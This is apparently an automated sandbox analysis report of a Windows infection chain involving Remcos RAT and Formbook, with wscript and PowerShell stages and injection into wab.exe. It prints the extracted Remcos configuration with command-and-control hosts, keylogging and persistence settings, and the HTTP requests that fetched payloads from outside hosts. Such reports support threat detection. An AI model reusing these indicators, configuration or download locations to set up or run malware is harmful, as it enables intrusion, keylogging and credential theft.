Source: 00000008.00000003.2537135847.000000000647C000.00000004.00000020.00020000.00000000.sdmp |
Malware Configuration Extractor: Remcos {"Host:Port:Password": "jgbours284hawara01.duckdns.org:3050:0jgbours284hawara01.duckdns.org:3051:1jgbours284hawara02.duckdns.org:3050:0", "Assigned name": "Protected", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "jnbcourg-8XH6PE", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "mvourhjs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"} |
Source: |
Binary string: System.Core.pdbF! source: powershell.exe, 00000016.00000002.2899923505.0000000008681000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: gqm.Core.pdb source: powershell.exe, 00000016.00000002.2885377459.00000000074A9000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: CallSite.Targetore.pdbq source: powershell.exe, 00000005.00000002.2489484769.00000000086E0000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: notepad.pdbGCTL source: wscript.exe, 00000000.00000003.1989736522.000001A47F191000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1991997565.000001A47E636000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.2498526890.000000000351D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.2494277320.00000000059E5000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Core.pdb source: powershell.exe, 00000005.00000002.2469252560.00000000075C9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2899923505.0000000008681000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: wntdll.pdb source: wab.exe |
Source: |
Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000005.00000002.2469252560.0000000007622000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2469252560.000000000764A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2885377459.00000000074A9000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbTe= source: powershell.exe, 00000005.00000002.2469252560.000000000764A000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5c}c source: powershell.exe, 00000016.00000002.2885377459.0000000007413000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb7} source: powershell.exe, 00000016.00000002.2885377459.00000000074A9000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Core.pdbk source: powershell.exe, 00000005.00000002.2469252560.00000000075C9000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5eU source: powershell.exe, 00000005.00000002.2469252560.000000000764A000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000016.00000002.2885377459.0000000007413000.00000004.00000020.00020000.00000000.sdmp |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 8_2_222E10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, |
8_2_222E10F1 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 8_2_222E6580 FindFirstFileExA, |
8_2_222E6580 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 16_2_0040AE51 FindFirstFileW,FindNextFileW, |
16_2_0040AE51 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 19_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen, |
19_2_00407EF8 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 20_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen, |
20_2_00407898 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: global traffic |
HTTP traffic detected: GET /Methink1.thn HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: europrotectie.roConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /FIPWKWOaFXJGe178.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: duelvalenza.itCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /FIPWKWOaFXJGe178.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: www.duelvalenza.itConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /Detentionen.java HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.163Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /PUzAKuQ35.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.163Cache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /abt9/?Uzgp=d6Th&InLTkv7P=nO9f1eGtjr/sKzmKQQI1Gqn0vyk6T1iYdf0G+pz4r/6P+DB2OQ61Wxj49dZSRaju4ptYBpim6kquuDHdOrdtO4lYB4JWeqCW78ZirT3u+fANwUiQR/vajzHJfJfY/KmwIA== HTTP/1.1Host: www.387mfyr.sbsAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 |
Source: wab.exe, 00000010.00000003.2531648040.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000010.00000002.2534668907.00000000033D9000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: :///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfms-settings:networkfile://192.168.2.1/all/install/setup.au3https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook) |
Source: wab.exe, 00000010.00000003.2531648040.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000010.00000002.2534668907.00000000033D9000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: :///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfms-settings:networkfile://192.168.2.1/all/install/setup.au3https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo) |
Source: wab.exe, 00000008.00000002.3327352353.00000000222B0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000014.00000002.2512248136.0000000000400000.00000040.80000000.00040000.00000000.sdmp |
String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy) |
Source: wab.exe, wab.exe, 00000014.00000002.2512248136.0000000000400000.00000040.80000000.00040000.00000000.sdmp |
String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy) |
Source: wab.exe |
String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook) |
Source: wab.exe, 00000008.00000002.3327479336.0000000022380000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp |
String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook) |
Source: wab.exe, 00000008.00000002.3327479336.0000000022380000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp |
String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo) |
Source: powershell.exe, 0000000E.00000002.3202569251.0000000004FCF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3202569251.0000000004AF7000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://87.121.105.163 |
Source: powershell.exe, 0000000E.00000002.3202569251.0000000004AF7000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://87.121.105.163/Detentionen.javaXRwl |
Source: powershell.exe, 00000016.00000002.2824348491.0000000004B27000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://87.121.105.163/Detentionen.javaXRwl4 |
Source: powershell.exe, 0000000E.00000002.3202569251.0000000004FCF000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://87.121.108 |
Source: powershell.exe, 0000000E.00000002.3192791124.0000000000D6D000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.mM5 |
Source: powershell.exe, 0000000E.00000002.3263668974.0000000007340000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.micro |
Source: powershell.exe, 00000005.00000002.2469252560.000000000758E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.microD |
Source: powershell.exe, 00000002.00000002.2707049436.00000214ABB20000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.v |
Source: powershell.exe, 00000002.00000002.2568004154.000002149582A000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://europrotectie.ro |
Source: wab.exe, 00000008.00000002.3295624818.00000000064AF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2537135847.00000000064AF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2493992487.00000000064AF000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://geoplugin.net/json.gp)B |
Source: wab.exe, 00000008.00000002.3295624818.00000000064AF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2537135847.00000000064AF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2493992487.00000000064AF000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://geoplugin.net/json.gp0B8 |
Source: wab.exe, 00000008.00000003.2493965045.000000002247C000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://geoplugin.net/json.gpf |
Source: powershell.exe, 00000002.00000002.2692569252.00000214A36AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2461742751.0000000005BB6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000005.00000002.2457149588.0000000004CA8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000002.00000002.2568004154.0000021493641000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2457149588.0000000004B51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3202569251.00000000049A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2824348491.00000000049D1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000005.00000002.2457149588.0000000004CA8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: wab.exe, 00000008.00000002.3295624818.000000000647C000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://www.duelvalenza.it/FIPWKWOaFXJGe178.bin |
Source: wab.exe, wab.exe, 00000014.00000002.2512248136.0000000000400000.00000040.80000000.00040000.00000000.sdmp |
String found in binary or memory: http://www.ebuddy.com |
Source: wab.exe, wab.exe, 00000014.00000002.2512248136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000014.00000002.2517724529.000000000380D000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://www.imvu.com |
Source: wab.exe, 00000014.00000002.2517724529.000000000380D000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://www.imvu.comata |
Source: wab.exe, 00000008.00000002.3327352353.00000000222B0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000014.00000002.2512248136.0000000000400000.00000040.80000000.00040000.00000000.sdmp |
String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com |
Source: wab.exe, 00000008.00000002.3327352353.00000000222B0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000014.00000002.2512248136.0000000000400000.00000040.80000000.00040000.00000000.sdmp |
String found in binary or memory: http://www.imvu.comr |
Source: wab.exe, 00000010.00000002.2533483224.0000000002EB4000.00000004.00000010.00020000.00000000.sdmp |
String found in binary or memory: http://www.nirsoft.net |
Source: wab.exe, 00000014.00000002.2512248136.0000000000400000.00000040.80000000.00040000.00000000.sdmp |
String found in binary or memory: http://www.nirsoft.net/ |
Source: powershell.exe, 00000002.00000002.2568004154.0000021493641000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000005.00000002.2457149588.0000000004B51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3202569251.00000000049A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2824348491.00000000049D1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore6lBcq |
Source: powershell.exe, 00000005.00000002.2461742751.0000000005BB6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000005.00000002.2461742751.0000000005BB6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000005.00000002.2461742751.0000000005BB6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: wab.exe, 00000008.00000003.2493992487.000000000647C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2537135847.000000000647C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3295624818.000000000647C000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://duelvalenza.it/ |
Source: wab.exe, 00000008.00000002.3312967278.0000000021D50000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3295424016.000000000643F000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://duelvalenza.it/FIPWKWOaFXJGe178.bin |
Source: wab.exe, 00000008.00000002.3312967278.0000000021D50000.00000004.00001000.00020000.00000000.sdmp |
String found in binary or memory: https://duelvalenza.it/FIPWKWOaFXJGe178.binLagdsWaheuroprotectie.ro/FIPWKWOaFXJGe178.bin |
Source: wab.exe, 00000008.00000002.3295424016.000000000643F000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://duelvalenza.it/FIPWKWOaFXJGe178.binq( |
Source: powershell.exe, 00000002.00000002.2568004154.0000021493866000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2568004154.0000021495668000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://europrotectie.ro |
Source: powershell.exe, 00000002.00000002.2568004154.0000021493866000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://europrotectie.ro/Methink1.thnP |
Source: powershell.exe, 00000005.00000002.2457149588.0000000004CA8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://europrotectie.ro/Methink1.thnXRwl |
Source: powershell.exe, 00000005.00000002.2457149588.0000000004CA8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000002.00000002.2568004154.0000021494A34000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: wab.exe, 00000010.00000003.2518435340.0000000004BB1000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com: |
Source: wab.exe, 00000010.00000003.2518435340.0000000004BB1000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033 |
Source: wab.exe, 00000010.00000003.2531648040.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000010.00000002.2534668907.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000010.00000003.2518435340.0000000004BB1000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live |
Source: wab.exe |
String found in binary or memory: https://login.yahoo.com/config/login |
Source: powershell.exe, 00000002.00000002.2692569252.00000214A36AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2461742751.0000000005BB6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: wab.exe, wab.exe, 00000014.00000002.2512248136.0000000000400000.00000040.80000000.00040000.00000000.sdmp |
String found in binary or memory: https://www.google.com |
Source: wab.exe |
String found in binary or memory: https://www.google.com/accounts/servicelogin |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 16_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard, |
16_2_0040987A |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 16_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, |
16_2_004098E2 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 19_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, |
19_2_00406DFC |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 19_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard, |
19_2_00406E9F |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 20_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, |
20_2_004068B5 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 20_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard, |
20_2_004072B5 |
Source: amsi64_2132.amsi.csv, type: OTHER |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: amsi32_2668.amsi.csv, type: OTHER |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: amsi32_5804.amsi.csv, type: OTHER |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: amsi32_6324.amsi.csv, type: OTHER |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: 00000019.00000002.3019175755.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown |
Source: 00000019.00000002.3056858069.0000000023690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown |
Source: 0000001E.00000002.3289864871.0000000000D40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown |
Source: 0000001D.00000002.3291632690.00000000044E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown |
Source: 0000001E.00000002.3289791266.0000000000D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown |
Source: 0000001E.00000002.3288503989.0000000000460000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown |
Source: 0000001F.00000002.3289923987.0000000000F40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown |
Source: Process Memory Space: powershell.exe PID: 2132, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 2668, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 5804, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 6324, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: C:\Windows\System32\wscript.exe |
Process created: Commandline size = 6231 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: Commandline size = 6231 |
Source: C:\Windows\SysWOW64\wscript.exe |
Process created: Commandline size = 6007 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process created: Commandline size = 6007 |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" |